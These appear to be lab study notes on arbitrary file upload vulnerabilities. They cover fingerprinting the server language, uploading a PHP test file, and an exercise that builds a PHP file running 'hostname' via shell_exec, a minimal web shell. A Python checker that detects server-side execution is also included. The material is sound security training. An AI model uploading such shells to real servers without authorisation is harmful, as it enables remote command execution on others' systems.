# Intro

- The most basic type of file upload vulnerability occurs when the web application applies no validation filters to uploaded files, which in turn allows any file type to be uploaded by default

# Arbitrary File Upload

- No mention of allowed file types on the page

![[images/Pasted image 20251222195700.png]]

- Clicking upload opens a file selector dialog that allows `all files`

![[images/Pasted image 20251222195735.png]]

# Identifying Web Framework

- The most common scripts used to exploit web applications through arbitrary file upload are web shells and reverse shells
- A web shell has to be written in the same programming language the web server runs, because it calls platform-specific functions to execute system commands on the back-end server; web shells are therefore not cross-platform scripts
- So the first step is to identify which language runs the web application
- One easy method is to visit the `/index.ext` page, swapping `ext` for common web extensions such as `php`, `asp`, `aspx` or `jsp`; the extension that returns the page (rather than a `404`) is a strong hint. This only works when the index page is served directly; an application behind a router or URL rewriting may answer the same for every extension, which makes the probe inconclusive
- Several other techniques can help identify the technologies behind the web application, like the [Wappalyzer](https://www.wappalyzer.com/) extension, which is available for all major browsers

![[images/Pasted image 20251222195948.png]]

- We may also run web scanners to identify the web framework, like the Burp/ZAP scanners or other web vulnerability assessment tools

# Vuln Identification

- Now that we have identified the web framework and its programming language, we can test whether we can upload a file with the matching extension
- As an initial test for arbitrary `PHP` upload, create a basic `Hello World` script to check whether the uploaded file is actually executed as `PHP` rather than served back as plain text

```bash
echo '<?php echo "Hello HTB";?>' > test.php
```

- Upload `test.php` and either click download or visit `http://server_ip:port/uploads/test.php`
- The output shows `Hello HTB` without the surrounding `<?php` tags, so our PHP code is being executed on the server. If the raw source came back instead, the file was uploaded but not executed, which is a much weaker finding

![[images/Pasted image 20251222200706.png]]

# Exercise

- Create a PHP file that executes the `hostname` command. Mind the quoting: the PHP string uses single quotes, so the outer shell string must use double quotes (a single quote inside a single-quoted bash string terminates it early and the command breaks)

```bash
echo "<?php echo shell_exec('hostname'); ?>" > hostname.php
```

![[images/Pasted image 20251222201236.png]]

- Upload `hostname.php`

![[images/Pasted image 20251222201321.png]]

- Visit `/uploads/hostname.php`

![[images/Pasted image 20251222201409.png]]
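The two checks above (probe `/index.ext` to guess the language, then see whether the uploaded marker file is executed or merely echoed back as source) are easy to automate. The script below is an added example, not part of the original note or of the HTB material: the target base URL `http://server_ip:port`, the `/uploads/` path and the fake HTTP responses are assumptions constructed so it runs offline, and the fetcher is injectable so the same functions can be pointed at a real host with `http_fetch`.

```python
"""
Added example (not from the original note): probe /index.<ext> to guess the
server-side language, then classify the response to an uploaded marker file
as "executed", "served_as_source" or "no_output".  The target URL and the
/uploads/ path are assumptions; the offline demo uses constructed responses.
"""
import urllib.error
import urllib.request

# Candidate languages: marker script that prints a token, and the opening tag
# that would show up in the response if the file were served raw.
LANGS = {
    "php":  ('<?php echo "{token}"; ?>', "<?php"),
    "asp":  ('<% Response.Write("{token}") %>', "<%"),
    "aspx": ('<% Response.Write("{token}") %>', "<%"),
    "jsp":  ('<%= "{token}" %>', "<%"),
}


def http_fetch(url, timeout=5):
    """Real fetcher: returns (status, body). Not used by the offline demo."""
    req = urllib.request.Request(url, headers={"User-Agent": "upload-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""
    except urllib.error.URLError:
        return None, ""


def probe_index(base_url, fetch, exts=tuple(LANGS)):
    """Return the extensions for which /index.<ext> answers 200.

    One hit is the usual case; several hits (or none) means the app sits
    behind a router or URL rewriting and this heuristic is inconclusive.
    """
    hits = []
    for ext in exts:
        status, _ = fetch(f"{base_url.rstrip('/')}/index.{ext}")
        if status == 200:
            hits.append(ext)
    return hits


def build_marker(lang, token):
    """Filename and contents of a harmless marker file for the language."""
    template, _ = LANGS[lang]
    return f"test.{lang}", template.format(token=token)


def classify_upload(body, lang, token):
    """Decide what the server did with the uploaded marker file.

    'executed'         - token came back without the opening tag
    'served_as_source' - script returned verbatim: upload works, but the
                         handler does not execute that extension
    'no_output'        - neither: wrong path, renamed on upload, or blocked
    """
    _, open_tag = LANGS[lang]
    if token in body and open_tag not in body:
        return "executed"
    if open_tag in body:
        return "served_as_source"
    return "no_output"


# Constructed offline responses standing in for a PHP app with /uploads/.
TOKEN = "e1f3c0de"
FAKE_SITE = {
    "http://server_ip:port/index.php": (200, "<html>upload form</html>"),
    "http://server_ip:port/index.asp": (404, ""),
    "http://server_ip:port/index.aspx": (404, ""),
    "http://server_ip:port/index.jsp": (404, ""),
    "http://server_ip:port/uploads/test.php": (200, TOKEN),
}


def fake_fetch(url):
    return FAKE_SITE.get(url, (404, ""))


def run_offline_demo(fetch=fake_fetch, base_url="http://server_ip:port"):
    """Chain the steps: probe, build the marker, check the upload path."""
    langs = probe_index(base_url, fetch)
    if len(langs) != 1:
        return {"langs": langs, "verdict": "inconclusive"}
    lang = langs[0]
    filename, _ = build_marker(lang, TOKEN)
    # The upload itself is form-specific (browser or Burp); here we only
    # check what the assumed /uploads/ path returns afterwards.
    _, body = fetch(f"{base_url}/uploads/{filename}")
    return {"langs": langs, "verdict": classify_upload(body, lang, TOKEN)}


if __name__ == "__main__":
    print(run_offline_demo())
```

The random-looking token matters: checking for a fixed string like `Hello HTB` cannot tell an executed script from a page that happens to echo the upload back, whereas a token that only appears once the interpreter ran the file, with no `<?php` around it, does. A `served_as_source` verdict is still worth recording: the upload filter is absent, but the handler for that extension is not, so the next step is trying other extensions or a different upload directory.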